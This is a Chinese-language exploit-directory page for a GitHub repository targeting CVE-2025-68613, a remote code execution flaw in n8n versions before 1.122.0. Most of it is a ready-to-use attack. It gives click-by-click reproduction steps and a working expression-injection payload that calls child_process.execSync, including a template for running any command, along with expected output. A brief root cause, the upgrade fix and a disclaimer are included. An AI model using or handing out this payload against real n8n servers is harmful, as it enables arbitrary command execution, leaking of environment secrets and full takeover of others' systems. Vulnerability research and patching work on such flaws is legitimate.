Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: n8n RCE漏洞利用与文档 | Kitploit
工具/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: n8n RCE漏洞利用与文档

查看仓库
1062228个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

n8n - CVE-2025-68613: 动态管理代码资源的不当控制

漏洞描述

n8n 包含一个严重的任意代码执行漏洞,存在于其工作流表达式评估系统中。在特定条件下,经过身份验证的用户在工作流配置期间提供的表达式可能会在未充分隔离底层运行时的执行上下文中被评估。

受影响版本

  • 受影响: n8n < v1.122.0
  • 已修复: n8n >= v1.122.0

必要条件

  • 对 n8n 实例的已验证访问权限
  • 能够创建/编辑工作流

复现步骤

1. 创建新工作流

  • 点击 "添加工作流"

2. 添加节点

  • 添加 "手动触发器" 节点
  • 添加 "设置" 节点(连接到触发器)

3. 配置负载

  • 点击 "设置" 节点
  • 点击 "添加值" → 选择 "字符串"
  • 将字段命名为 "result"
  • 点击 "=" 图标启用表达式模式

4. 注入负载

将以下负载粘贴到表达式字段中:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. 执行

  • 点击 "执行步骤"
  • 查看 "设置" 节点输出以获取命令结果

CVE-2025-68613 漏洞利用演示

负载示例

ID 命令:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

PWD 命令:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

自定义命令模板:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

预期输出

对于 id 命令:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

对于 pwd 命令:

root@kitploit:~
/app

根本原因

表达式评估器缺少清理机制,无法阻止函数表达式访问 this.process(Node.js 进程对象),从而导致可以访问系统模块。

影响

  • 任意命令执行
  • 文件系统访问
  • 环境变量泄露
  • 完全系统沦陷

缓解措施

升级到 n8n v1.122.0 或更高版本。

参考资料

  • 修复:https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • 仓库:https://github.com/n8n-io/n8n
  • 博客文章:https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

免责声明:此信息仅供沙盒和教育目的使用。未经授权使用此信息利用系统是非法且不道德的。在测试或利用漏洞之前,请始终获得适当的授权。

下载工具